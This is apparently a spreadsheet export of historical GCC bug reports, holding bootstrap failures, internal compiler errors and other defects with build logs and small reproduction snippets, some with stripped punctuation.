/.vol/gcc/obj/gcc-4.0.0-20050414/6.5-gcc-java/gcc/xgcc -B/.vol/gcc/obj/gcc-4.0.0-20050414/6.5-gcc-java/gcc/ -B/.vol/gcc/share/mips-sgi-irix6.5/bin/ -B/.vol/gcc/share/mips-sgi-irix6.5/lib/ -isystem /.vol/gcc/share/mips-sgi-irix6.5/include -isystem /.vol/gcc/share/mips-sgi-irix6.5/sys-include  -mabi=32 -shared  src/.libs/debug.o src/.libs/prep_cif.o src/.libs/types.o src/.libs/raw_api.o src/.libs/java_raw_api.o src/mips/.libs/ffi.o src/mips/.libs/o32.o src/mips/.libs/n32.o  -lc  -Wl-soname -Wllibffi.so.5 `test -n sgi5.0:sgi5.1 &amp;&amp; echo -Wl-set_version -Wlsgi5.0:sgi5.1` -Wl-update_registry -Wl.libs/so_locations -o .libs/libffi.so.5.1
ld: FATAL   45 : Non-PIC (src/mips/.libs/o32.o) used in shared/call_shared link.
collect2: ld returned 4 exit status
make[8]: *** [libffi.la] Error 1
Obviously the new O32 closure support isn't PIC code causing the link
failure above.
This is a regression from 3.4.
Environment:
System: IRIX64 columba 6.5 10120104 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: /.vol/gcc/src/gcc-4.0-branch-dist/configure --prefix=/.vol/gcc --with-local-prefix=/.vol/gcc --disable-nls --enable-libgcj --with-gmp-dir=/.vol/gcc/obj/gmp-4.1.3 --with-mpfr-dir=/.vol/gcc/obj/gmp-4.1.3 --with-gnu-as --with-as=/homes/ro/bin/gas-2.15
How-To-Repeat:
Bootstrap on mips-sgi-irix6.5 with --enable-libgcj.</t>
  </si>
  <si>
    <t>GCC-45672</t>
  </si>
  <si>
    <t>[4.6 Regression] Bootstrap failure for powerpc-apple-darwin9: 'rs6000_units_per_simd_word' defined but not used</t>
  </si>
  <si>
    <t>Bootstrapping revision 164287 on powerpc-apple-darwin9 fails with:
...
/opt/gcc/darwin_buildw/./prev-gcc/xgcc -B/opt/gcc/darwin_buildw/./prev-gcc/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/bin/ -B/opt/gcc/gcc4.6w/powerpc-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/include -isystem /opt/gcc/gcc4.6w/powerpc-apple-darwin9/sys-include    -c   -g -O2 -mdynamic-no-pic -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.6-work/gcc -I../../gcc-4.6-work/gcc/. -I../../gcc-4.6-work/gcc/../include -I../../gcc-4.6-work/gcc/../libcpp/include -I/sw/include  -I../../gcc-4.6-work/gcc/../libdecnumber -I../../gcc-4.6-work/gcc/../libdecnumber/dpd -I../libdecnumber  -I/sw/include -DCLOOG_PPL_BACKEND    \
		../../gcc-4.6-work/gcc/config/rs6000/rs6000.c -o rs6000.o
../../gcc-4.6-work/gcc/config/rs6000/rs6000.c:3576:1: error: 'rs6000_units_per_simd_word' defined but not used [-Werror=unused-function]
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-476</t>
  </si>
  <si>
    <t>Internal compiler error with -fPIC flag</t>
  </si>
  <si>
    <t>Compiling the following file with these flags causes
an internal compiler error.
I get the following error:
SDL_events.c:261: Internal compiler error in gen_lowpart at emit-rtl.c:1084
Please submit a full bug report.
Release:
gcc version 2.96 20000810 (experimental)
Environment:
Redhat Linux 6.2
How-To-Repeat:
/usr/local/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.96/cc1  SDL_events.i -quiet -dumpbase SDL_events.c -g -O2 -version  -fPIC  -o SDL_events.s 
Take out the -fPIC flag and the error does not occur</t>
  </si>
  <si>
    <t>rodrigc</t>
  </si>
  <si>
    <t>GCC-26690</t>
  </si>
  <si>
    <t>ICE in get_callee_fndecl at tree.c:5806 with OpenMP</t>
  </si>
  <si>
    <t>The following invalid OpenMP-C++ code snippet crashes the compiler
when compiled with -fopenmp:
=======================================
struct A
{
    A(int)
}
void foo()
{
    A a(0)
#pragma omp parallel private (a)
}
=======================================
bug.cc: In function 'void foo()':
bug.cc:9: error: no matching function for call to 'A::A()'
bug.cc:3: note: candidates are: A::A(int)
bug.cc:2: note:                 A::A(const A&amp;)
bug.cc:9: internal compiler error: in get_callee_fndecl at tree.c:5806
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-50192</t>
  </si>
  <si>
    <t>Wrong character comparision with wide strings</t>
  </si>
  <si>
    <t>ig25@linux-fd1f:~/Krempel/4&gt; cat compare.f90
program main
  character(kind=4len=2) :: c1 c2
  c1 = 4_' '
  c2 = 4_' '
  c1(1:1) = transfer(257 mold=c1)
  c2(1:1) = transfer(64 mold=c2)
  if (c1 &lt; c2) print *strange...
end program main
ig25@linux-fd1f:~/Krempel/4&gt; gfortran compare.f90
ig25@linux-fd1f:~/Krempel/4&gt; ./a.out
 strange...
The problem is in compare_string.  We use
int
compare_string (gfc_charlen_type len1 const CHARTYPE *s1
                gfc_charlen_type len2 const CHARTYPE *s2)
{
  const UCHARTYPE *s
  gfc_charlen_type len
  int res
  res = memcmp (s1 s2 ((len1 &lt; len2) ? len1 : len2) * sizeof (CHARTYPE))
which works on big-endian but not on little-endian where the memcmp is used
to compare (bytewise) 0x01 0x01 0x00 0x00 vs. 0x40 0x00 0x00 0x00.</t>
  </si>
  <si>
    <t>GCC-17738</t>
  </si>
  <si>
    <t>Binary Compatibility: _Jv_FindClassInCache</t>
  </si>
  <si>
    <t>Right now I think interpreted classes and other things
loaded by the system class loader are stored in the
internal class cache.
First this seems incorrect.  I think it would be better
to use this only for classes that are linked into the
application and thus registered before the VM has been
brought up.  Once the VM is up new classes should be
registered with the system ClassLoader (via the loadedClasses
map).
Second I believe we do multiple calls to _Jv_FindClassInCache
when trying to load a class.  With the change above we should
only need one at the very lowest level of the search.</t>
  </si>
  <si>
    <t>GCC-20447</t>
  </si>
  <si>
    <t>ICE in output_operand: invalid expression as operand</t>
  </si>
  <si>
    <t>--------------------------------------------------------------------------------
$ gcc -O2 bug.c
bug.c: In function â€˜bazâ€™:
bug.c:54: internal compiler error: output_operand: invalid expression as operand
--------------------------------------------------------------------------------
fails with 4.0.0 and mainline might be related to bug 20342.</t>
  </si>
  <si>
    <t>GCC-297</t>
  </si>
  <si>
    <t>Internal Compiler Error 56 on Template instantantiaon</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Thu 8 Jun 2000 16:14:48 -0700 (PDT)
 Original-Message-ID: 
 I am using 
    - gcc 2.95.3 ( from 17. May 2000 RedHat package compiled
		   from source)
    - Linux 2.2.14 with libc 2.1.3 and binutils 2.9.5.0.22
 The following source produces an error (see attachment). In short: getting
 a pointer to a static template member function of a class leads to 
 an internal compiler error 56. 
 The complete output of 'gcc -v bug.cc' is:
 ----------------------8&lt;--------------------------------------
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/specs gcc
 version 2.95.3 19991030 (prerelease)
  /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/cpp -lang-c++ -v -D__GNUC__=2
 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__
 -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux
 -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386
 -D__i386__ bug.cc /tmp/ccUB4Z4S.ii GNU CPP version 2.95.3 19991030
 (prerelease) (i386 Linux/ELF) #include ... search starts here: #include
  search starts here:
  /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/../../../../include/g++-3
  /usr/local/include
  /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/include
  /usr/include End of search list. The following default directories have
 been omitted from the search path:
 /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/../../../../i386-redhat-linux/include
 End of omitted list.
  /usr/lib/gcc-lib/i386-redhat-linux/2.95.3/cc1plus /tmp/ccUB4Z4S.ii -quiet
 -dumpbase bug.cc -version -o /tmp/ccALKQVC.s GNU C++ version 2.95.3
 19991030 (prerelease) (i386-redhat-linux) compiled by GNU C version 2.95.3
 19991030 (prerelease). bug.cc: In function `int main()': bug.cc:9:
 Internal compiler error 56. bug.cc:9: Please submit a full bug report.
 bug.cc:9: See  for
 instructions. 
 -------------------------------------------
 if you need further information please let me know.
Release:
2.95.2
How-To-Repeat:
class A {
public:
  template  static void foo() { T x = 1 x++ }
}
int main() {
  A::foo()                // ok
  void (*fptr)() = A::foo // Compiler error 56
  fptr()
}</t>
  </si>
  <si>
    <t>GCC-6267</t>
  </si>
  <si>
    <t>internal compiler error using nested class</t>
  </si>
  <si>
    <t>I get the please submit a bug report error when compiling a small method.
cd /home/ldavis/s.Manager-1.0-c++/fWaveFileDevInTest/
make -k
g++ -DPACKAGE=\s.Manager-1.0-c++\ -DVERSION=\1.1.0\ -DHAVE_DLFCN_H=1 -DPLAT_INTEL=1 -DOS_LINUX=1 -DHAVE_PTHREAD=1 -DSTDC_HEADERS=1 -DHAVE_BOOL= -DHAVE_NAMESPACES= -DHAVE_STD= -DHAVE_STL=  -I. -I.  -I /usr/local/fonix/sdk/includes -I /usr/local/fonix/sdk/includes/linux_x86 -I /usr/local/include/testharness    -v -save-temps -g -Wall  -pthread -c fWaveFileDevInTest.cpp
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.3/specs
gcc version 2.95.3 20010315 (SuSE)
GNU CPP version 2.95.3 20010315 (SuSE) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 /usr/local/fonix/sdk/includes
 /usr/local/fonix/sdk/includes/linux_x86
 /usr/local/include/testharness
 /usr/include/g++
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/../../../../i486-suse-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i486-suse-linux/2.95.3/cc1plus fWaveFileDevInTest.ii -quiet -dumpbase fWaveFileDevInTest.cc -g -Wall -version -o fWaveFileDevInTest.s
GNU C++ version 2.95.3 20010315 (SuSE) (i486-suse-linux) compiled by GNU C version 2.95.3 20010315 (SuSE).
fWaveFileDevInTest.cpp: In method `int Inherit::test()':
fWaveFileDevInTest.cpp:352: Internal compiler error.
fWaveFileDevInTest.cpp:352: Please submit a full bug report.
fWaveFileDevInTest.cpp:352: See  for instructions.
make: *** [fWaveFileDevInTest.o] Error 1
make: Target `all' not remade because of errors.
Compilation exited abnormally with code 2 at Thu Apr 11 19:57:06
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
Linux version 2.4.10-4GB (root@Pentium.suse.de) (gcc version 2.95.3 20010315 (SuSE)) #1 Fri Sep 28 17:20:21 GMT 2001
Pentium II 333 MHz 512k cache Compaq Professional Workstation 5100
How-To-Repeat:
This is the method in question:
int Inherit::test ()
{
   class myfWaveFileDevIn : public fWaveFileDevIn {
      public:
         fWaveFileDevIn::rdPtr
         fWaveFileDevIn::daemonRunning
         fWaveFileDevIn::stopDaemon
         fWaveFileDevIn::threadID
         fWaveFileDevIn::requestedSampleRate
         fWaveFileDevIn::thread
         fWaveFileDevIn::waveBuffer
         fWaveFileDevIn::close
         fWaveFileDevIn::open
         myfWaveFileDevIn ( fAudioIn *audioIn = NULL int sampleRate = 8000 const char *filename = NULL int readRate = 8000 )
            : fWaveFileDevIn(audioIn sampleRate filename readRate) {}
   }
   myfWaveFileDevIn* w = 0
// removing these lines makes it work!
   delete w
   w = 0
   for (int i = 0 i &lt; 8 ++i) {
       int sr = (((i % 2) == 0) ? 44100 : 8000)
       fMyAudioIn* fmai = new fMyAudioIn(this i)
      if (fmai) {
         try {
             w = new myfWaveFileDevIn(fmai sr test.wav)
         }
         catch (...) {
         }
         delete fmai
         fmai = 0
      }
   }
   return (passed)
}
There was originally code before the comment:
// removing these lines makes it work!
But it did not matter as far as the error was concerned.
This code has been stripped down almost as far as it can go.
If you start removing parameters from:
             w = new myfWaveFileDevIn(fmai sr test.wav)
you'll get a variety of bogus errors.  If you move that line outside the try you'll also get bogus errors.
I have similar code to this in other software in this collection and it seems to compile fine (I haven't run it yet).</t>
  </si>
  <si>
    <t>ldavis</t>
  </si>
  <si>
    <t>GCC-19109</t>
  </si>
  <si>
    <t>Creating archives with java.util.zip</t>
  </si>
  <si>
    <t>The below code produces a zip file that can be opened in WinZip 8.1 when
compiled with Sun JRE 1.4.1_01.  When compiled with GCJ 3.4.0 the zip file is
produced but WinZip says it's corrupt.
Is this a bug in GCJ or am I misunderstanding how java.util.zip works in libgcj?
Thanks.
Usage:  Pass in two arguments to class.  First arg is name of archive and second
is the name of the file you want to add to the archive.
************************************************************************
import java.io.BufferedInputStream
import java.io.File
import java.io.FileInputStream
import java.io.FileOutputStream
import java.util.zip.Deflater
import java.util.zip.ZipEntry
import java.util.zip.ZipOutputStream
public class ZipMain {
	/**
	 * 
	 */
	public ZipMain() {
		super()
	}
	public static void main(String[] args) {
		String sArchive = args[0]
		String sFile = args[1]
		if (sArchive==null || sFile==null || 
				sArchive.length()==0 || sFile.length()==0){
			return
		}
		File f = new File(sFile)
		if (!f.exists()){
			return
		}
		ZipOutputStream oArchive = null
		File fArchive = new File(sArchive)
		try {
			//open archive
			oArchive = new ZipOutputStream(new FileOutputStream(fArchive))
				oArchive.setLevel(Deflater.DEFAULT_COMPRESSION)
				//add file
			ZipEntry zipEntry = new ZipEntry(f.toString())
			FileInputStream fin = new FileInputStream(f)
			BufferedInputStream in = new BufferedInputStream(fin)
			oArchive.putNextEntry(zipEntry)
			byte[] buf = new byte[1024]
			int len
			while ((len = in.read(buf)) &gt;= 0) {
				oArchive.write(buf 0 len)
			}
			//clean up
			in.close()
			oArchive.closeEntry()
			oArchive.close()
		} catch (Exception e){
			e.printStackTrace()
		}
	}
}</t>
  </si>
  <si>
    <t>wayne.gray</t>
  </si>
  <si>
    <t>GCC-2158</t>
  </si>
  <si>
    <t>extra testsuite execute failures with -O -fomit-frame-pointer -p (profiling)</t>
  </si>
  <si>
    <t>I get extra testsuite failures when using profiling.
Specifically compile the following testcases from the
execute directory with flags shown and run the
resulting binary:
ERROR: pending-4.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: pending-4.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: memcpy-bi.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: memcpy-bi.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: complex-2.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: complex-2.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: cmpdi-1.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: cmpdi-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: arith-rand.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: arith-rand.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 980605-1.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 980605-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 980605-1.c: compiled program got signal 11: -O3 -fomit-frame-pointer -p
ERROR: 970312-1.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 970312-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 970312-1.c: compiled program got signal 11: -O3 -fomit-frame-pointer -p
ERROR: 950612-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 930628-1.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 930628-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 920501-6.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 920501-6.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 920501-2.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 920501-2.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 20000511-1.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: 20000511-1.c: compiled program got signal 11: -O2 -fomit-frame-pointer -p
ERROR: 20000412-4.c: compiled program got signal 11: -O -fomit-frame-pointer -p
ERROR: fp-cmp-4.c: compiled program got signal 11: -O -fomit-frame-pointer -p
Running under gdb typically shows:
Program received signal SIGSEGV Segmentation fault.
0x400c8317 in mcount () at soinit.c:59
Release:
3.0 20010301 (prerelease)
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-45066</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in namelist read in snapshot of 7/24/2010</t>
  </si>
  <si>
    <t>When I compile the following file with the snapshot of July 24 2010:
MODULE GA_commons
INTEGER :: nichflg(2)
END MODULE GA_commons
PROGRAM gafortran
USE GA_commons
NAMELIST /ga/ nichflg
READ (23 nml=ga)
END PROGRAM gafortran
I get the following message:
g.f90: In function gafortran:
g.f90:7:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-4170</t>
  </si>
  <si>
    <t>gcc3.01 can't compile STLport4.03 from http://www.stlport.org</t>
  </si>
  <si>
    <t xml:space="preserve"> When I compile the STLport with using gcc.mak as Makefile I got compilation error:
In file included from ../stlport/stl/_alloc.h:68
from ../stlport/memory:28
from dll_main.cpp:5:
../stlport/new:49:38: ../g++-include/new: No such file or directory
In file included from ../stlport/stdexcept:33
from ../stlport/stl/_range_errors.h:51
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/exception:48:44: ../g++-include/exception: No such file or directory
In file included from ../stlport/iostream.h:104
from ../stlport/wrap_std/iosfwd:64
from ../stlport/iosfwd:45
from ../stlport/stl/_string_fwd.h:22
from ../stlport/stdexcept:45
from ../stlport/stl/_range_errors.h:51
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/wrap_std/h/iostream.h:1:54: ../g++-include/iostream.h: No such file or directory
In file included from ../stlport/fstream.h:34
from ../stlport/wrap_std/iosfwd:65
from ../stlport/iosfwd:45
from ../stlport/stl/_string_fwd.h:22
from ../stlport/stdexcept:45
from ../stlport/stl/_range_errors.h:51
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/wrap_std/h/fstream.h:1:53: ../g++-include/fstream.h: No such file or directory
In file included from ../stlport/stl/_range_errors.h:51
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/stdexcept:50: parse error before `{' token
../stlport/stdexcept:54: `_S_bufsize' was not declared in this scope
../stlport/stdexcept:54: ISO C++ forbids declaration of `_M_name' with no type
../stlport/stdexcept:54: assignment (not initialization) in declaration
../stlport/stdexcept:55: parse error before `}' token
../stlport/stdexcept:56: virtual outside class declaration
../stlport/stdexcept:56: non-member function `const char* what()' cannot have
`const' method qualifier
../stlport/stdexcept: In function `const char* what()':
../stlport/stdexcept:56: `_M_name' undeclared (first use this function)
../stlport/stdexcept:56: (Each undeclared identifier is reported only once for
each function it appears in.)
../stlport/stdexcept: At global scope:
../stlport/stdexcept:58: parse error before `private'
../stlport/stdexcept:60: `_S_bufsize' was not declared in this scope
../stlport/stdexcept:61: parse error before `}' token
../stlport/stdexcept:63: base class `__Named_exception' has incomplete type
../stlport/stdexcept: In constructor `logic_error::logic_error(const string&amp;)':
../stlport/stdexcept:65: type `__Named_exception' is not an immediate basetype
for `logic_error'
../stlport/stdexcept: At global scope:
../stlport/stdexcept:68: base class `__Named_exception' has incomplete type
../stlport/stdexcept: In constructor `runtime_error::runtime_error(const
string&amp;)':
../stlport/stdexcept  0: type `__Named_exception' is not an immediate basetype
for `runtime_error'
In file included from ../stlport/stl/_string.h:1532
from ../stlport/string:44
from ../stlport/stl/_range_errors.h:55
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/stl/_string_io.h: At global scope:
../stlport/stl/_string_io.h:80: syntax error before `&amp;' token
../stlport/stl/_string_io.h:80: `ostream' was not declared in this scope
../stlport/stl/_string_io.h:80: `__os' was not declared in this scope
../stlport/stl/_string_io.h:81: parse error before `&lt;' token
../stlport/stl/_string_io.h:81: ISO C++ forbids declaration of `operator&lt;&lt;'
with no type
../stlport/stl/_string_io.h:81: `int&amp; operator&lt;&lt;(...)' must have an argument of
class or enumerated type
../stlport/stl/_string_io.h:81: `int&amp; operator&lt;&lt;(...)' must take exactly two
arguments
../stlport/stl/_string_io.h:84: syntax error before `&amp;' token
../stlport/stl/_string_io.h:84: `istream' was not declared in this scope
../stlport/stl/_string_io.h:84: `__is' was not declared in this scope
../stlport/stl/_string_io.h:84: `_CharT' was not declared in this scope
../stlport/stl/_string_io.h:84: `_Traits' was not declared in this scope
../stlport/stl/_string_io.h:84: `_Alloc' was not declared in this scope
../stlport/stl/_string_io.h:84: template argument 1 is invalid
../stlport/stl/_string_io.h:84: template argument 2 is invalid
../stlport/stl/_string_io.h:84: template argument 3 is invalid
../stlport/stl/_string_io.h:84: parse error before `&amp;' token
../stlport/stl/_string_io.h:84: ISO C++ forbids declaration of `operator&gt;&gt;'
with no type
../stlport/stl/_string_io.h:84: `int&amp; operator&gt;&gt;(...)' must have an argument of
class or enumerated type
../stlport/stl/_string_io.h:84: `int&amp; operator&gt;&gt;(...)' must take exactly two
arguments
../stlport/stl/_string_io.h:87: syntax error before `&amp;' token
../stlport/stl/_string_io.h:87: `istream' was not declared in this scope
../stlport/stl/_string_io.h:87: `__is' was not declared in this scope
../stlport/stl/_string_io.h:88: `_CharT' was not declared in this scope
../stlport/stl/_string_io.h:88: `_Traits' was not declared in this scope
../stlport/stl/_string_io.h:88: `_Alloc' was not declared in this scope
../stlport/stl/_string_io.h:88: template argument 1 is invalid
../stlport/stl/_string_io.h:88: template argument 2 is invalid
../stlport/stl/_string_io.h:88: template argument 3 is invalid
../stlport/stl/_string_io.h:88: parse error before `&amp;' token
../stlport/stl/_string_io.h:89: ISO C++ forbids declaration of `getline' with
no type
../stlport/stl/_string_io.h  3: syntax error before `&amp;' token
../stlport/stl/_string_io.h  4: `istream' was not declared in this scope
../stlport/stl/_string_io.h  4: `__is' was not declared in this scope
../stlport/stl/_string_io.h  4: `_CharT' was not declared in this scope
../stlport/stl/_string_io.h  4: `_Traits' was not declared in this scope
../stlport/stl/_string_io.h  4: `_Alloc' was not declared in this scope
../stlport/stl/_string_io.h  4: template argument 1 is invalid
../stlport/stl/_string_io.h  4: template argument 2 is invalid
../stlport/stl/_string_io.h  4: template argument 3 is invalid
../stlport/stl/_string_io.h  4: parse error before `&amp;' token
../stlport/stl/_string_io.h  5: ISO C++ forbids declaration of `getline' with
no type
../stlport/stl/_string_io.h: In function `int&amp; getline(...)':
../stlport/stl/_string_io.h  6: `__is' undeclared (first use this function)
../stlport/stl/_string_io.h  6: `__s' undeclared (first use this function)
../stlport/stl/_string_io.h: At global scope:
../stlport/stl/_string_io.h:100: `ostream' was not declared in this scope
../stlport/stl/_string_io.h:100: `__os' was not declared in this scope
../stlport/stl/_string_io.h:100: `streambuf' was not declared in this scope
../stlport/stl/_string_io.h:100: `__buf' was not declared in this scope
../stlport/stl/_string_io.h:100: parse error before `)' token
../stlport/stl/_string_io.h: In function `void __sgi_string_fill(...)':
../stlport/stl/_string_io.h:102: `__os' undeclared (first use this function)
../stlport/stl/_string_io.h:105: `__n' undeclared (first use this function)
../stlport/stl/_string_io.h:105: `__buf' undeclared (first use this function)
In file included from ../stlport/stl/_string_io.h:115
from ../stlport/stl/_string.h:1532
from ../stlport/string:44
from ../stlport/stl/_range_errors.h:55
from ../stlport/stl/_vector.h:50
from ../stlport/vector:36
from dll_main.cpp:6:
../stlport/stl/_string_io.c: At global scope:
../stlport/stl/_string_io.c:179: syntax error before `&amp;' token
../stlport/stl/_string_io.c:179: `ostream' was not declared in this scope
../stlport/stl/_string_io.c:180: parse error before `&lt;' token
../stlport/stl/_string_io.c:181: ISO C++ forbids declaration of `operator&lt;&lt;'
with no type
../stlport/stl/_string_io.c:181: `int&amp; operator&lt;&lt;(...)' must have an argument
of class or enumerated type
../stlport/stl/_string_io.c:181: `int&amp; operator&lt;&lt;(...)' must take exactly two
arguments
../stlport/stl/_string_io.c: In function `int&amp; operator&lt;&lt;(...)':
../stlport/stl/_string_io.c:183: `streambuf' undeclared (first use this
function)
../stlport/stl/_string_io.c:187: `ios' undeclared (first use this function)
../stlport/stl/_string_io.c:187: parse error before `::' token
../stlport/stl/_string_io.c:204: parse error before `::' token
../stlport/stl/_string_io.c:209: parse error before `::' token
../stlport/stl/_string_io.c:212: confused by earlier errors bailing out
make: *** Error 1
My system using gcc3.01 linux kernel 2.4.8 glibc2.2.3
Release:
unknown
Environment:
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.0.1/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-cstdio=stdio --enable-clocale=generic --enable-languages=cc++f77objcjava --program-suffix=-3.0.1 --enable-objc-gc --host=i586-mandrake-linux-gnu
Thread model: posix
gcc version 3.0.1
How-To-Repeat:
extract the file and type make in the directory STLport-4.0/src</t>
  </si>
  <si>
    <t>carfield</t>
  </si>
  <si>
    <t>GCC-59011</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in make_decl_rtl at varasm.c:1147</t>
  </si>
  <si>
    <t>$ gcc -v -save-temps -std=gnu99 err.c
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu8' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagod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enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.1 (Ubuntu/Linaro 4.8.1-10ubuntu8) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=gnu99' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.8/cc1 -E -quiet -v -imultiarch x86_64-linux-gnu err.c -mtune=generic -march=x86-64 -std=gnu99 -fpch-preprocess -fstack-protector -Wformat -Wformat-security -o err.i
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=gnu99' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.8/cc1 -fpreprocessed err.i -quiet -dumpbase err.c -mtune=generic -march=x86-64 -auxbase err -std=gnu99 -version -fstack-protector -Wformat -Wformat-security -o err.s
GNU C (Ubuntu/Linaro 4.8.1-10ubuntu8) version 4.8.1 (x86_64-linux-gnu)
        compiled by GNU C version 4.8.1 GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Ubuntu/Linaro 4.8.1-10ubuntu8) version 4.8.1 (x86_64-linux-gnu)
        compiled by GNU C version 4.8.1 GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 1dbd2d69491678f2baa989ac072ab7ac
err.c: In function â€˜fâ€™:
err.c:14:8: internal compiler error: in make_decl_rtl at varasm.c:1147
   void f(char *s int i) {
        ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccrNDSr7.out file please attach this to your bugreport.
~/err$ cat err.i
# 1 err.c
# 1 
# 1 /usr/include/stdc-predef.h 1 3 4
# 30 /usr/include/stdc-predef.h 3 4
# 1 /usr/include/x86_64-linux-gnu/bits/predefs.h 1 3 4
# 31 /usr/include/stdc-predef.h 2 3 4
# 1  2
# 1 err.c
struct foo {
  int i[8] j[8] k[8] n
}
int main() {
  int m = 5
  char *sym[16][16]
  char buf[1024] = { 0 }
  int a[m]
  int has(int j int k) { return a[j] == k }
  int match(struct foo *p) { return has(p-&gt;i[0] p-&gt;j[0]) }
  void f(char *s int i) {
    if (i == 0) {
      int anon(void *data) {
        return match(data)
      }
